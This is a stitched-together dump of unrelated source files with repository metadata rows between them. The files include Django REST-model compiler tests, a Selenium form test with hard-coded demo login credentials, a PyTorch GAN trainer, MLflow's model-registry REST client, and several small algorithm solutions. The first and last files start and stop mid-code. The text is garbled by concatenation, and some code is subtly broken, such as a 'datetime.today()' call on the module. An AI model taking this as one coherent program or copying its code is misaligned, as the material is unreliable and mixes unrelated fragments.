        self.assertEqual(compiler.execute_sql(None), None)
    def test_uniq_result_no_query(self):
        # Contradictory filters (pk=1 AND pk=2) produce no query; SINGLE -> None.
        compiler = self.get_compiler(
            Pizza.objects.filter(pk=1).filter(pk=2)
        )
        self.assertEqual(compiler.execute_sql(SINGLE), None)
    def test_no_result_no_query(self):
        # Same contradictory filter with the default result type -> empty iterator.
        compiler = self.get_compiler(
            Pizza.objects.filter(pk=1).filter(pk=2)
        )
        self.assertEqual(list(compiler.execute_sql()), [])
    def test_get_cursor_query(self):
        # Asking for a raw CURSOR is unsupported by the REST backend.
        compiler = self.get_compiler(
            Pizza.objects.filter(pk=1)
        )
        self.assertRaises(ProgrammingError, compiler.execute_sql, CURSOR)
class TestErrorResponseFormat(RestModelTestCase):
    """Checks error handling when the remote API's payload is malformed."""
    databases = ['default', 'api']
    # Canonical serialized pizza used by the mocked API responses below.
    pizza_data = {
        "cost": 2.08,
        "to_date": "2016-11-20T08:46:02.016000",
        "from_date": "2016-11-15",
        "price": 10.0,
        "id": 1,
        "links": {
            "toppings": "toppings/"
        },
        "name": "suprème",
        "toppings": [
            1,
            2,
            3,
            4,
            5
        ],
        "menu": 1
    }
    # Static mock responses served to the 'api' connection (OAuth token + pizza list).
    rest_fixtures = {
        '/oauth2/token/': [
            {'data': {'scope': 'read write', 'access_token': 'HJKMe81faowKipJGKZSwg05LnfJmrU',
                      'token_type': 'Bearer', 'expires_in': 36000}}
        ],
        'pizza': [
            {
                'data': {
                    'pizzas': [pizza_data]
                }
            }
        ],
    }
    database_rest_fixtures = {'api': rest_fixtures}
    def test_remote_name_mismatch(self):
        # A payload keyed 'pazzi' instead of 'pizzas' must raise a config error;
        # a correctly-keyed empty payload must simply yield zero results.
        with self.mock_api('pizza', {'pazzi': []}, using='api'):
            self.assertRaisesMessage(
                ImproperlyConfigured,
                'the response does not contains the result for pizzas',
                list,
                Pizza.objects.all()
            )
        with self.mock_api('pizza', {'pizzas': []}, using='api'):
            self.assertEqual(len(list(Pizza.objects.all())), 0)
    def test_remote_not_contains_id(self):
        # Related data missing the model's ID must raise OperationalError.
        with self.mock_api('pizza', {'menus': [{}], 'pizzas': [self.pizza_data]}, using='api'):
            self.assertRaisesMessage(
                OperationalError,
                'the response from the server does not contains the ID of the model.',
                list,
                Pizza.objects.all().select_related('menu')
            )
| Yupeek/django-rest-models | rest_models/tests/tests_compilers.py | tests_compilers.py | py | 3,530 | python | en | code | 63 | github-code | 90 |
37045504301 | import time
import unittest
import sys
from selenium import webdriver
from selenium.webdriver import ActionChains
from POM_mainversion.login import *
from POM_mainversion.Detail_page import *
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "...", "..."))
class TestGarden(unittest.TestCase):
    """End-to-end Selenium flow: log in and register a new garden record."""
    @classmethod
    def setUpClass(self):
        # NOTE(review): unittest passes the class here; the parameter is
        # conventionally named `cls`.
        # NOTE(review): hard-coded local chromedriver path - breaks on other machines.
        self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver")
        self.driver.implicitly_wait(10)
        self.driver.maximize_window()
    def test_login_valid(self):
        """Log in with the demo account and submit the garden-details form."""
        driver = self.driver
        self.driver.get("https://top-upstream-client.mulberrysoft.com")
        login = LoginPage(driver)
        garden = Detail_Garden_Page(driver)
        # Authenticate with the demo credentials.
        login.enter_username("demo004")
        login.enter_password("598745")
        login.click_login()
        time.sleep(2)
        login.click_interface()
        time.sleep(2)
        garden.into_garden()
        time.sleep(2)
        garden.upload_image_garden()
        time.sleep(2)
        # Scroll the unit input into view before filling the form fields.
        scroll = driver.find_element_by_xpath("//ion-item[4]/ion-input/input")
        action = ActionChains(driver)
        action.move_to_element(scroll).perform()
        garden.garden_enter_unit()
        time.sleep(2)
        garden.name_garden_input("eiei")
        time.sleep(2)
        garden.number_garden_input("555")
        time.sleep(2)
        garden.area_garden_input("8")
        time.sleep(2)
        # Scroll to the drop-down selects further down the page.
        scroll2 = driver.find_element_by_xpath("//ion-item[10]/ion-select")
        action = ActionChains(driver)
        action.move_to_element(scroll2).perform()
        time.sleep(2)
        garden.garden_enter_owner()
        time.sleep(2)
        garden.garden_enter_district()
        time.sleep(2)
        garden.garden_enter_status()
        time.sleep(2)
        # Scroll to and press the submit button.
        scroll3 = driver.find_element_by_xpath("//form/ion-button")
        action = ActionChains(driver)
        action.move_to_element(scroll3).perform()
        garden.garden_accept_submit()
        time.sleep(2)
    @classmethod
    def tearDownClass(cls):
        cls.driver.close()
        cls.driver.quit()
        print("Test Completed")
# Allow running this Selenium suite directly.
if __name__ == '__main__':
    unittest.main()
| maxcrup007/Selenium_Webdriver_Python | POM_mainversion/TestCase/Detail_page/Garden/TC_001.py | TC_001.py | py | 2,520 | python | en | code | 0 | github-code | 90 |
39002366239 | import random
class House:
    """A simple drawable house with a chimney-smoke animation.

    The house sits at a fixed baseline (y = 360); `sy` tracks the current
    vertical position of the rising smoke and wraps back to the baseline
    after rising 40 pixels.
    """

    def __init__(self, x, baseColor, roofColor=None):
        # Bug fix: the default roof color used to be a shared mutable list
        # ([0.3, 0.3, 0.3]); a fresh list is now created per instance.
        self.x = x
        self.y = 360
        self.sy = self.y  # smoke y-position, drifts upward in update()
        self.baseColor = baseColor
        self.roofColor = [0.3, 0.3, 0.3] if roofColor is None else roofColor
        self.vx = random.randint(-5, 5)   # horizontal smoke offset
        self.vy = random.randint(0, 10)   # vertical smoke offset
        self.my = random.randint(1, 10)   # smoke rise speed

    def draw(self, window):
        """Draw the house body, roof and smoke onto `window`."""
        window.drawRect(self.x, self.y, 40, 40, *self.baseColor)
        window.drawTri(self.x - 5, self.y, self.x + 20, self.y - 20, self.x + 45, self.y, *self.roofColor)
        self.drawSmoke(window, 20)

    def drawSmoke(self, window, count):
        """Draw `count` translucent smoke puffs at the current smoke position."""
        for _ in range(count):
            window.drawCircle(self.x + self.vx, self.sy - self.vy, 10, .6, .6, .6, .25)
            print("made a smoke")

    def update(self, dt):
        """Raise the smoke by `my * dt`; reset to the baseline after 40 px."""
        self.sy -= self.my * dt
        if self.sy < self.y - 40:
            self.sy = self.y
| madmulk9/ccircle | madison/something/house.py | house.py | py | 899 | python | en | code | 0 | github-code | 90 |
5254664658 | import unittest
import timeit
class ThreeSumBinarySearch:
    """Count index triples (i < j < k) whose values sum to zero.

    The input list is sorted in place once; for each pair (i, j) a binary
    search over the tail of the array looks for the value completing the
    triple.
    """

    def __init__(self, array):
        self.array = array
        self.array.sort()  # sorts the caller's list in place (as before)
        self.n = len(self.array)

    def count(self):
        """Return the number of zero-sum triples."""
        count = 0
        for i in range(self.n):
            for j in range(i + 1, self.n):
                # The third value must cancel the pair's sum.
                val = (self.array[i] + self.array[j]) * -1
                if self.find(j + 1, self.n - 1, val):
                    count += 1
        return count

    def find(self, lo, hi, key):
        """Binary search for `key` in self.array[lo..hi] (inclusive bounds)."""
        while lo <= hi:
            # Bug fix: floor division. `(hi - lo)/2` yields a float under
            # Python 3, and a float index raised TypeError on self.array[mid].
            mid = lo + (hi - lo) // 2
            if key < self.array[mid]:
                hi = mid - 1
            elif key > self.array[mid]:
                lo = mid + 1
            else:
                return True
        return False
class ThreeSumBinarySearchTest(unittest.TestCase):
    """Unit tests for ThreeSumBinarySearch.count()."""
    def test_count(self):
        finder = ThreeSumBinarySearch([-3, -2, -1, 0, 1, 2, 3])
        self.assertEqual(finder.count(), 5)
        finder = ThreeSumBinarySearch([3, 2, 1, 0, 1, 2, 3])
        self.assertEqual(finder.count(), 0)
# Benchmark count() on random data before handing control to unittest.
if __name__ == '__main__':
    setup = '''
from __main__ import ThreeSumBinarySearch
import random
array = random.sample(range(-1000, 1000), 100)
'''
    # Report the worst of several timing runs (10 invocations each).
    print(max(timeit.repeat("ThreeSumBinarySearch(array).count()", setup= setup, number= 10)))
unittest.main() | mberlanda/algorithm-princeton | week_1/analysis_of_algorithms/three_sum_binary_search.py | three_sum_binary_search.py | py | 1,261 | python | en | code | 1 | github-code | 90 |
6797592090 | import numpy as np
from matplotlib.path import Path
# plane path
def make_plane(rot_ang):
    """Return a matplotlib Path tracing a stylised plane silhouette.

    The outline is built in local coordinates, centred on its mean point,
    and rotated by `rot_ang` degrees.
    """
    # overall proportions of the silhouette
    l = 1.
    lw = 0.25 * l
    lt = 0.15 * l
    ln = l - lw - lt
    w = 0.6 * l
    wt = 0.3 * w
    wn = 0.25 * w
    ww = 0.15 * w
    # outline vertices, nose first, traced around the silhouette
    outline = [
        (0., l),
        (wn, l - ln),
        (w - wn, lt + 0.55 * lw),
        (w, lt + lw),
        (w, lt),
        (0.6 * wt, lt),
        (wt, 0.),
        (-wt, 0.),
        (-0.6 * wt, lt),
        (-w, lt),
        (-w, lt + lw),
        (-w + wn, lt + 0.55 * lw),
        (-wn, l - ln),
    ]
    outline.append(outline[0])  # close the polygon
    xs = np.array([p[0] for p in outline])
    ys = np.array([p[1] for p in outline])
    # centre on the outline's mean point
    xs = xs - np.mean(xs)
    ys = ys - np.mean(ys)
    # rotate by rot_ang degrees
    ang = rot_ang / 180. * np.pi
    xr = xs * np.cos(ang) - ys * np.sin(ang)
    yr = xs * np.sin(ang) + ys * np.cos(ang)
    return Path(np.vstack((xr, yr)).T)
| rskschrom/er2_mpl_marker | plane_path.py | plane_path.py | py | 1,030 | python | en | code | 0 | github-code | 90 |
33466671654 | import cv2 as cv
import numpy as np
# Blend a star logo onto the top-left corner of a painting using masks.
background = cv.imread('photos/VanGogh-starry_night.jpg')
logo = cv.imread('photos/star.png')
assert background is not None, "File 'VanGogh-starry_night.jpg' could not be read or does not exist"
assert logo is not None, "File 'star.png' could not be read or does not exist"

# Region of interest: the top-left patch matching the logo size.
rows, cols, channels = logo.shape
roi = background[0:rows, 0:cols]

# Binary mask of the logo (and its inverse) from a grayscale threshold.
logo_gray = cv.cvtColor(logo, cv.COLOR_BGR2GRAY)
ret, mask = cv.threshold(logo_gray, 10, 255, cv.THRESH_BINARY)
mask_inv = cv.bitwise_not(mask)

# Background with the logo area blacked out, and the logo pixels alone.
roi_bg = cv.bitwise_and(roi, roi, mask=mask_inv)
logo_fg = cv.bitwise_and(logo, logo, mask=mask)

# Merge and write the patch back into the painting, then display it.
combined = cv.add(roi_bg, logo_fg)
background[0:rows, 0:cols] = combined
cv.imshow('Result', background)
cv.waitKey(0)
cv.destroyAllWindows()
| Sanidhanand/opencv | bitwiseOperations.py | bitwiseOperations.py | py | 1,020 | python | en | code | 0 | github-code | 90 |
29626540787 | #
# @lc app=leetcode id=43 lang=python
#
# [43] Multiply Strings
#
class Solution(object):
    def multiply(self, num1, num2):
        """Multiply two non-negative integers given as decimal strings.

        Classic digit-grid multiplication: the product of digits i and j
        lands at positions i+j (carry) and i+j+1 (units) of the result.

        :type num1: str
        :type num2: str
        :rtype: str
        """
        len1, len2 = len(num1), len(num2)
        digits = [0] * (len1 + len2)  # result has at most len1+len2 digits
        for i in reversed(range(len1)):
            for j in reversed(range(len2)):
                low = i + j + 1   # units position
                high = i + j      # carry position
                product = int(num1[i]) * int(num2[j])
                total = digits[low] + product
                digits[low] = total % 10
                digits[high] += total // 10
        text = ''.join(str(d) for d in digits).lstrip('0')
        return text or '0'
# Ad-hoc smoke check when run directly.
if __name__ == '__main__':
    """
    需要自己实现一个乘法...
    漂亮的图解 https://leetcode.com/problems/multiply-strings/discuss/17605/Easiest-JAVA-Solution-with-Graph-Explanation
    """
    # (The bare string above notes: implement the multiplication by hand;
    # the link shows a diagram of the digit-position scheme.)
    s = Solution()
    # Expect "0 9801": string product of '0' and '99', then 99*99 for contrast.
    print(s.multiply('0', '99'), 99 * 99)
| zhch-sun/leetcode_szc | 43.multiply-strings.py | 43.multiply-strings.py | py | 1,066 | python | en | code | 0 | github-code | 90 |
18325829269 | N=int(input())
# Flag ("bandera"): can N be written as i*j with single-digit i and j?
bandera=False
for i in range(10):
    for j in range(10):
        producto=i*j
        if producto==N:
            bandera=True
# Print the verdict ("No" is printed by the else branch that follows).
if bandera==True:
    print("Yes")
else:
print("No") | Aasthaengg/IBMdataset | Python_codes/p02880/s166434728.py | s166434728.py | py | 179 | python | es | code | 0 | github-code | 90 |
18332815199 | # ワ―シャルフロイドで解くよ
def main():
    """Read a road network from stdin and answer refuelling-count queries.

    Towns within road distance <= L are reachable on one tank of fuel; each
    query (s, t) prints the number of refuels needed, or -1 if unreachable.
    """
    import sys
    input = sys.stdin.readline  # faster than input() for many reads
    N, M, L = map(int, input().split())
    # Distance matrix, initialised to "infinity" for unreached pairs.
    d = [[10 ** 12] * N for _ in range(N)]
    # Read edges; roads longer than the tank range L are useless, skip them.
    for i in range(M):
        a, b, c = map(int, input().split())
        if L >= c:
            d[a - 1][b - 1] = d[b - 1][a - 1] = c
    for i in range(N):
        d[i][i] = 0  # no self loops
    # Warshall-Floyd: all-pairs shortest road distance between towns.
    for k in range(N):
        for i in range(N):
            for j in range(N):
                d[i][j] = min(d[i][k] + d[k][j], d[i][j])
    # Towns whose shortest distance fits in one tank are joined with cost 1.
    edge = [[10 ** 12] * N for _ in range(N)]
    for i in range(N):
        for j in range(N):
            if d[i][j] <= L:
                edge[i][j] = 1
    # Second Warshall-Floyd pass: minimum number of tanks between any towns.
    for k in range(N):
        for i in range(N):
            for j in range(N):
                edge[i][j] = min(edge[i][k] + edge[k][j], edge[i][j])
    # Answer the queries.
    Q = int(input())
    for _ in range(Q):
        s, t = map(int, input().split())
        if edge[s - 1][t - 1] >= 10 ** 12:
            print(-1)
        else:
            print(edge[s - 1][t - 1] - 1)  # the first tank is free, hence -1
if __name__ == "__main__":
main() | Aasthaengg/IBMdataset | Python_codes/p02889/s846808995.py | s846808995.py | py | 1,603 | python | ja | code | 0 | github-code | 90 |
2903854670 | import os
import torch
import torch.nn as nn
import datetime
import torch.nn.functional as F
import lpips
import numpy as np
from tqdm.auto import tqdm
from torchvision import utils as vutils
from ..definitions.textureLoss import TextureLoss
def save_imgs(imgs, basename):
    """Save a batch of image tensors to `<basename>.jpg` as an 8-per-row grid.

    The tensor is detached and moved to CPU first. Any failure is re-raised
    as a generic Exception tagged with this file and function name.
    """
    try:
        filename = basename + '.jpg'
        vutils.save_image(imgs.detach().cpu(), filename, nrow=8, normalize=True, pad_value=0.3)
    except Exception as e:
        # Chain the original exception so the real traceback is preserved.
        raise Exception(f'Error: {__file__}: save_imgs: {str(e)}') from e
class GanTrainer():
    """Training driver for the GAN: alternates discriminator and generator
    updates, tracks per-epoch losses, and early-stops on the LPIPS
    validation loss.
    """
    def __init__(self, model, optimizer_d, optimizer_g, chk_name, patience=1, min_delta=0):
        self.model = model
        self.d_optimizer = optimizer_d
        self.g_optimizer = optimizer_g
        self.chk_name = chk_name
        self.patience = patience          # non-improving checks tolerated
        self.min_validation_loss = float('inf')
        self.min_delta = min_delta        # minimum worsening that counts
        self.counter = 0                  # consecutive non-improving checks
        self.adversarial_loss = nn.BCELoss()
        self.pixelwise_loss = nn.L1Loss()
        self.texture_loss = TextureLoss()
        self.device = torch.device('cpu')
        self.loss_fn_alex = lpips.LPIPS(net='vgg')
    def save_model(self, path, model_name):
        '''
        Save the model's state_dict as <path>/<model_name>__<chk_name>__<date>.pt.
        '''
        # NOTE(review): this module does `import datetime`, so `datetime.today()`
        # raises AttributeError - it should be `datetime.datetime.today()`.
        date = datetime.today().strftime('%Y-%m-%d')
        torch.save(self.model.state_dict(),
                   os.path.join(path, model_name + "__" + self.chk_name + "__" + date + '.pt'))
    def to(self, device):
        # Move the trainer's loss modules to `device`; future tensors follow.
        self.device = device
        self.adversarial_loss.to(device)
        self.pixelwise_loss.to(device)
        self.loss_fn_alex.to(device)
    def _early_stop(self, validation_loss):
        """Return True once validation loss fails to improve `patience` times."""
        if validation_loss < self.min_validation_loss:
            self.min_validation_loss = validation_loss
            self.counter = 0
        elif validation_loss > (self.min_validation_loss + self.min_delta):
            self.counter += 1
            if self.counter >= self.patience:
                return True
        return False
    def _exec(self, input_b, real_b, enable_discriminator, enable_generator):
        """Forward pass computing (lossD, lossG, prediction).

        Gradients are tracked only for the parts flagged as enabled."""
        D = self.model.D
        batch_size = len(input_b)
        input_b = input_b.to(self.device)
        real_b = real_b.to(self.device)
        r = self.model.get_resolution()
        # Crop the target to the model's current resolution window.
        # (assumes real_b is laid out as (..., H, W) - TODO confirm)
        real_b = real_b[..., (r-32):((2*r)-32), 0:r]
        size = int((self.model.get_resolution() / 8 - 1))
        # Smoothed real/fake label maps (0.9 / 0.1) for the discriminator.
        lab_real = torch.full((batch_size, 1, size, size), 0.9).to(self.device)
        lab_fake = torch.full((batch_size, 1, size, size), 0.1).to(self.device)
        if (enable_generator):
            with torch.enable_grad():
                prediction = self.model(input_b)
        else:
            with torch.no_grad():
                prediction = self.model(input_b)
        if (enable_discriminator):
            with torch.enable_grad():
                D_real = D(real_b)
                D_fake = D(prediction)
        else:
            with torch.no_grad():
                D_real = D(real_b)
                D_fake = D(prediction)
        lossD_real = self.adversarial_loss(torch.sigmoid(D_real), lab_real)
        lossD_fake = self.adversarial_loss(torch.sigmoid(D_fake), lab_fake)
        lossD = lossD_real + lossD_fake
        # Generator: fool the discriminator plus an L1 reconstruction term.
        lossG_adv = self.adversarial_loss(torch.sigmoid(D_fake), lab_real)
        pixelwise_loss_value = self.pixelwise_loss(prediction, real_b)
        #pixelwise_loss_value = self.loss_fn_alex(prediction, real_b).mean()
        lossG = 0.1 * lossG_adv + pixelwise_loss_value
        return lossD, lossG, prediction
    def evaluate(self, validation_dataset):
        """Average LPIPS(VGG) distance between targets and predictions."""
        valid_loss = 0.0
        self.model.eval()
        with torch.no_grad():
            batch_pbar = tqdm(validation_dataset, desc = "Validation - Batch", leave = False)
            for batch in batch_pbar:
                input_b = batch['inputs']
                real_b = batch['reals']
                batch_size = len(input_b)
                input_b = input_b.to(self.device)
                real_b = real_b.to(self.device)
                r = self.model.get_resolution()
                real_b = real_b[..., (r-32):((2*r)-32), 0:r]
                prediction = self.model(input_b)
                #pixelwise_loss_value = self.pixelwise_loss(prediction, real_b)
                #lossG = pixelwise_loss_value
                lossG = self.loss_fn_alex(real_b, prediction)
                lossG = lossG.mean()
                valid_loss += lossG.tolist()
                batch_pbar.set_postfix({'validation_loss': lossG.tolist(), 'patience': self.counter})
        avg_valid_loss = valid_loss / len(validation_dataset)
        return avg_valid_loss
    def _train(self, input_b, real_b, d, g):
        """One optimisation step; `d`/`g` select which networks update."""
        enable_d = d
        if enable_d:
            self.model.train_discriminator()
            self.d_optimizer.zero_grad()
        enable_g = g
        if enable_g:
            self.model.train_generator()
            self.g_optimizer.zero_grad()
        lossD, lossG, prediction = self._exec(input_b, real_b, enable_d, enable_g)
        if enable_d:
            lossD.backward()
            self.d_optimizer.step()
        if enable_g:
            lossG.backward()
            self.g_optimizer.step()
        return lossD, lossG, prediction
    def train(self, train_dataset, validation_dataset, save_folder, offset = 0, mode = ['d', 'g'], epochs=200):
        """Full training loop.

        For the first `offset` epochs only the discriminator trains; then the
        schedule in `mode` cycles ('d' discriminator, 'g' generator, 'b' both).
        Checkpoints, sample images and loss arrays are saved every epoch.
        """
        # loop over the epochs, batch by batch
        valid_loss = 1000.0
        self.counter = 0
        # Per-epoch training loss histories.
        train_d_losses = []
        train_g_losses = []
        # Validation loss history.
        valid_losses = []
        valid_loss = 1.0
        lossD = 1.1
        for epoch in tqdm(range(epochs), desc = "Epochs", leave = False):
            epoch_d_loss = 0
            epoch_g_loss = 0
            if epoch < offset:
                d = True
                g = False
            else:
                flag = mode[(epoch - offset) % len(mode)]
                d = flag == 'd' or flag == 'b'
                g = flag == 'g'or flag == 'b'
            # If the discriminator is already strong, train only the generator.
            # NOTE(review): on the first epoch `lossD` is the 1.1 sentinel;
            # afterwards it is the previous epoch's last-batch loss tensor.
            if lossD <= 1.05:
                d = False
                g = True
            batch_pbar = tqdm(train_dataset, desc = "Training - Batch", leave = True)
            for batch in batch_pbar:
                input_b = batch['inputs']
                real_b = batch['reals']
                self.model.eval_generator()
                self.model.eval_discriminator()
                lossD, lossG, prediction = self._train(input_b, real_b, d, g)
                epoch_d_loss += lossD.tolist()
                epoch_g_loss += lossG.tolist()
                batch_pbar.set_postfix({'v': self.min_validation_loss, 'd': lossD.item(), 'g': lossG.item(), 'p': self.counter})
            avg_epoch_d_loss = epoch_d_loss / len(train_dataset)
            train_d_losses.append(avg_epoch_d_loss)
            avg_epoch_g_loss = epoch_g_loss / len(train_dataset)
            train_g_losses.append(avg_epoch_g_loss)
            print('e_{}: D(x)={:.4f} D(G(z))={:.4f}'.format(epoch, avg_epoch_d_loss, avg_epoch_g_loss))
            if g:
                # validation loss
                valid_loss = self.evaluate(validation_dataset)
                # print('val_loss', valid_loss)
                valid_losses.append(valid_loss)
                print('V(x):{}'.format(valid_loss))
                if self._early_stop(valid_loss):
                    #self.save_model('GAN')
                    break
            # Save a sample grid, the model checkpoints and the loss arrays.
            save_imgs(prediction, os.path.join(save_folder, "train_e_{}".format(epoch)))
            self.model.save(
                os.path.join(save_folder, "discriminator_{}_{}".format(self.model.get_resolution(), epoch)),
                os.path.join(save_folder, "generator_{}_{}".format(self.model.get_resolution(), epoch)),
            )
            try:
                np.savez(os.path.join(save_folder, "loss_{}".format(epoch)), array1=train_d_losses, array2=train_g_losses, array3=valid_losses)
            except Exception as e:
                print(e)
        return train_d_losses, train_g_losses, valid_losses
| paolacarboni/project-vision-perception | srcs/textAwareMultiGan/definitions/trainer.py | trainer.py | py | 8,088 | python | en | code | 0 | github-code | 90 |
12322045085 | import logging
from mlflow.entities.model_registry import RegisteredModel, ModelVersion
from mlflow.protos.model_registry_pb2 import ModelRegistryService, CreateRegisteredModel, \
UpdateRegisteredModel, DeleteRegisteredModel, ListRegisteredModels, \
GetLatestVersions, CreateModelVersion, UpdateModelVersion, \
DeleteModelVersion, GetModelVersionDownloadUri, SearchModelVersions, \
RenameRegisteredModel, GetRegisteredModel, GetModelVersion, TransitionModelVersionStage
from mlflow.store.entities.paged_list import PagedList
from mlflow.store.model_registry.abstract_store import AbstractStore
from mlflow.utils.proto_json_utils import message_to_json
from mlflow.utils.rest_utils import call_endpoint, extract_api_info_for_service
# REST API prefix shared by all model-registry endpoints.
_PATH_PREFIX = "/api/2.0"
# Maps each request message class to its (endpoint, HTTP method) pair.
_METHOD_TO_INFO = extract_api_info_for_service(ModelRegistryService, _PATH_PREFIX)
_logger = logging.getLogger(__name__)
class RestStore(AbstractStore):
    """
    Note:: Experimental: This entity may change or be removed in a future release without warning.
    Client for a remote model registry server accessed via REST API calls
    :param get_host_creds: Method to be invoked prior to every REST request to get the
      :py:class:`mlflow.rest_utils.MlflowHostCreds` for the request. Note that this
      is a function so that we can obtain fresh credentials in the case of expiry.
    """
    def __init__(self, get_host_creds):
        super(RestStore, self).__init__()
        self.get_host_creds = get_host_creds
    def _call_endpoint(self, api, json_body):
        # Resolve the (endpoint, HTTP verb) registered for this API message and
        # issue the request, deserialising into the matching Response proto.
        endpoint, method = _METHOD_TO_INFO[api]
        response_proto = api.Response()
        return call_endpoint(self.get_host_creds(), endpoint, method, json_body, response_proto)
    # CRUD API for RegisteredModel objects
    def create_registered_model(self, name):
        """
        Create a new registered model in backend store.
        :param name: Name of the new model. This is expected to be unique in the backend store.
        :return: A single object of :py:class:`mlflow.entities.model_registry.RegisteredModel`
          created in the backend.
        """
        req_body = message_to_json(CreateRegisteredModel(name=name))
        response_proto = self._call_endpoint(CreateRegisteredModel, req_body)
        return RegisteredModel.from_proto(response_proto.registered_model)
    def update_registered_model(self, name, description):
        """
        Updates metadata for RegisteredModel entity.
        :param name: Registered model name.
        :param description: New model description.
        :return: A single updated :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
        """
        req_body = message_to_json(UpdateRegisteredModel(
            name=name, description=description))
        response_proto = self._call_endpoint(UpdateRegisteredModel, req_body)
        return RegisteredModel.from_proto(response_proto.registered_model)
    def rename_registered_model(self, name, new_name):
        """
        Renames the registered model.
        :param name: Registered model name.
        :param new_name: New proposed name for the registered model.
        :return: A single updated :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
        """
        req_body = message_to_json(RenameRegisteredModel(
            name=name, new_name=new_name))
        response_proto = self._call_endpoint(RenameRegisteredModel, req_body)
        return RegisteredModel.from_proto(response_proto.registered_model)
    def delete_registered_model(self, name):
        """
        Delete registered model.
        Backend raises exception if a registered model with given name does not exist.
        :param name: Registered model name.
        :return: None
        """
        req_body = message_to_json(DeleteRegisteredModel(
            name=name))
        self._call_endpoint(DeleteRegisteredModel, req_body)
    def list_registered_models(self):
        """
        List of all registered models.
        :return: List of :py:class:`mlflow.entities.model_registry.RegisteredModel` objects.
        """
        req_body = message_to_json(ListRegisteredModels())
        response_proto = self._call_endpoint(ListRegisteredModels, req_body)
        return [RegisteredModel.from_proto(registered_model)
                for registered_model in response_proto.registered_models]
    def get_registered_model(self, name):
        """
        :param name: Registered model name.
        :return: A single :py:class:`mlflow.entities.model_registry.RegisteredModel` object.
        """
        req_body = message_to_json(GetRegisteredModel(name=name))
        response_proto = self._call_endpoint(GetRegisteredModel, req_body)
        return RegisteredModel.from_proto(response_proto.registered_model)
    def get_latest_versions(self, name, stages=None):
        """
        Latest version models for each requested stage. If no ``stages`` argument is provided,
        returns the latest version for each stage.
        :param name: Registered model name.
        :param stages: List of desired stages. If input list is None, return latest versions for
                       'Staging' and 'Production' stages.
        :return: List of :py:class:`mlflow.entities.model_registry.ModelVersion` objects.
        """
        req_body = message_to_json(GetLatestVersions(name=name, stages=stages))
        response_proto = self._call_endpoint(GetLatestVersions, req_body)
        return [ModelVersion.from_proto(model_version)
                for model_version in response_proto.model_versions]
    # CRUD API for ModelVersion objects
    def create_model_version(self, name, source, run_id):
        """
        Create a new model version from given source and run ID.
        :param name: Registered model name.
        :param source: Source path where the MLflow model is stored.
        :param run_id: Run ID from MLflow tracking server that generated the model
        :return: A single object of :py:class:`mlflow.entities.model_registry.ModelVersion`
          created in the backend.
        """
        req_body = message_to_json(CreateModelVersion(name=name, source=source, run_id=run_id))
        response_proto = self._call_endpoint(CreateModelVersion, req_body)
        return ModelVersion.from_proto(response_proto.model_version)
    def transition_model_version_stage(self, name, version, stage,
                                       archive_existing_versions):
        """
        Update model version stage.
        :param name: Registered model name.
        :param version: Registered model version.
        :param stage: New desired stage for this model version.
        :param archive_existing_versions: If this flag is set, all existing model
            versions in the stage will be atomically moved to the "archived" stage.
        :return: A single :py:class:`mlflow.entities.model_registry.ModelVersion` object.
        """
        req_body = message_to_json(TransitionModelVersionStage(
            name=name, version=str(version),
            stage=stage,
            archive_existing_versions=archive_existing_versions))
        response_proto = self._call_endpoint(TransitionModelVersionStage, req_body)
        return ModelVersion.from_proto(response_proto.model_version)
    def update_model_version(self, name, version, description):
        """
        Update metadata associated with a model version in backend.
        :param name: Registered model name.
        :param version: Registered model version.
        :param description: New description.
        :return: None.
        """
        req_body = message_to_json(UpdateModelVersion(name=name, version=str(version),
                                                      description=description))
        response_proto = self._call_endpoint(UpdateModelVersion, req_body)
        return ModelVersion.from_proto(response_proto.model_version)
    def delete_model_version(self, name, version):
        """
        Delete model version in backend.
        :param name: Registered model name.
        :param version: Registered model version.
        :return: None
        """
        req_body = message_to_json(DeleteModelVersion(name=name, version=str(version)))
        self._call_endpoint(DeleteModelVersion, req_body)
    def get_model_version(self, name, version):
        """
        :param name: Registered model name.
        :param version: Registered model version.
        :return: A single :py:class:`mlflow.entities.model_registry.ModelVersion` object.
        """
        req_body = message_to_json(GetModelVersion(name=name, version=str(version)))
        response_proto = self._call_endpoint(GetModelVersion, req_body)
        return ModelVersion.from_proto(response_proto.model_version)
    def get_model_version_download_uri(self, name, version):
        """
        Get the download location in Model Registry for this model version.
        :param name: Registered model name.
        :param version: Registered model version.
        :return: A single URI location that allows reads for downloading.
        """
        req_body = message_to_json(GetModelVersionDownloadUri(name=name, version=str(version)))
        response_proto = self._call_endpoint(GetModelVersionDownloadUri, req_body)
        return response_proto.artifact_uri
    def search_model_versions(self, filter_string):
        """
        Search for model versions in backend that satisfy the filter criteria.
        :param filter_string: A filter string expression. Currently supports a single filter
                              condition either name of model like ``name = 'model_name'`` or
                              ``run_id = '...'``.
        :return: PagedList of :py:class:`mlflow.entities.model_registry.ModelVersion`
                 objects.
        """
        req_body = message_to_json(SearchModelVersions(filter=filter_string))
        response_proto = self._call_endpoint(SearchModelVersions, req_body)
        model_versions = [ModelVersion.from_proto(mvd)
                          for mvd in response_proto.model_versions]
        return PagedList(model_versions, None)
| castorfou/data-scientist-skills | python-sandbox/mlflow/mlflow/store/model_registry/rest_store.py | rest_store.py | py | 10,288 | python | en | code | 5 | github-code | 90 |
30684501649 | n, m = map(int, input().split())
# Bug fix: the accumulator was named `list`, shadowing the builtin.
lengths = []
for _ in range(n):
    lengths.append(int(input()))

# Binary search for the largest piece length that still yields >= m pieces.
start = 1
end = max(lengths)
result = 0
while start <= end:
    total = 0
    mid = (start + end) // 2
    for item in lengths:
        total += item // mid  # pieces of length `mid` cut from this cable
    if total < m:
        end = mid - 1
    else:
        result = mid          # feasible; try a longer piece length
        start = mid + 1
print(result)
| Hajin74/Problem_Solving | 백준/Silver/1654. 랜선 자르기/랜선 자르기.py | 랜선 자르기.py | py | 364 | python | en | code | 0 | github-code | 90 |
20146044665 | import pytest
from typing import List
class Solution:
    def findMaxConsecutiveOnes(self, nums: List[int]) -> int:
        """Return the length of the longest run of consecutive 1s in nums."""
        if not nums:
            return 0
        best = 0
        current = 0
        for value in nums:
            if value == 1:
                current += 1
            else:
                best = max(best, current)
                current = 0
        # Account for a run that reaches the end of the list.
        return max(best, current)
# Parametrised cases for test_solution; currently empty, so no runs occur.
test_data_set = [
]
